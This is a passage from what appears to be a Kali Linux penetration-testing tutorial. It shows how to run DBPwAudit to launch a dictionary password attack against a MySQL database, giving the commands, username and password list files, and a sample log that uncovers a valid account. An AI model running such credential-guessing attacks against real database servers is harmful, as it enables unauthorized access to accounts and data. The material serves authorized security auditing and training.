DBPwAudit is a Java-based tool designed to audit passwords for Oracle, MySQL, MS-SQL, and IBM DB2 servers. The application design is greatly simplified to allow us to add more database technologies, as required. It helps the pentester to discover valid user accounts on the database management system, if not hardened with a secure password policy. It currently supports the dictionary-based password attack mechanism.

To start DBPwAudit, navigate to Kali Linux | Vulnerability Analysis | Database Assessment | dbpwaudit or execute the following command in your shell:

# cd /usr/share/dbpwaudit/
# dbpwaudit

This will display all the options and usage instructions on your screen. In order to know which database drivers are supported by DBPwAudit, execute the following command:

# dbpwaudit -L

This will list all the available database drivers that are specific to a particular database management system. It is also important to note their aliases in order to refer to them for test execution. In order to perform this particular example usage of the tool, we will have to install the MySQL driver. Once the MySQL database driver is in place, we can start auditing the target database server for common user accounts. For this exercise, we have also created two files, users.txt and passwords.txt, with a list of common usernames and passwords:

# dbpwaudit -s -d pokeronline -D MySQL -U \ users.txt -P passwords.txt
DBPwAudit v0.8 by Patrik Karlsson <patrik@cqure.net>
[Tue Sep 14 17:55:41 UTC 2013] Starting password audit ...
[Tue Sep 14 17:55:41 UTC 2013] Testing user: root, pass: admin123
[Tue Sep 14 17:55:41 UTC 2013] Testing user: pokertab, pass: admin123
ERROR: message: Access denied for user 'root'@'' (using
password: YES), code: 1045
[Tue Sep 14 17:55:50 UTC 2013] Testing user: root, pass: RolVer123
ERROR: message: Access denied for user 'pokertab'@'' (using password: YES), code: 1045
[Tue Sep 14 17:55:56 UTC 2013] Testing user: pokertab, pass: RolVer123 ...
[Tue Sep 14 17:56:51 UTC 2013] Finnishing password audit ...
Results for password scan against using provider MySQL
user: pokertab pass: RolVer123
Tested 12 passwords in 69.823 seconds (0.17186314tries/sec)

Hence, we successfully discovered a valid user account. The use of the -d commandline switch represents the target database name, -D is used for a particular database alias relevant to target DBMS, -U is used for the usernames list, and -P is for the passwords list.

Recommended For You.

Check_MK is an extension to the Nagios monitoring system that allows creating rule-based configuration using Python and offloading work from the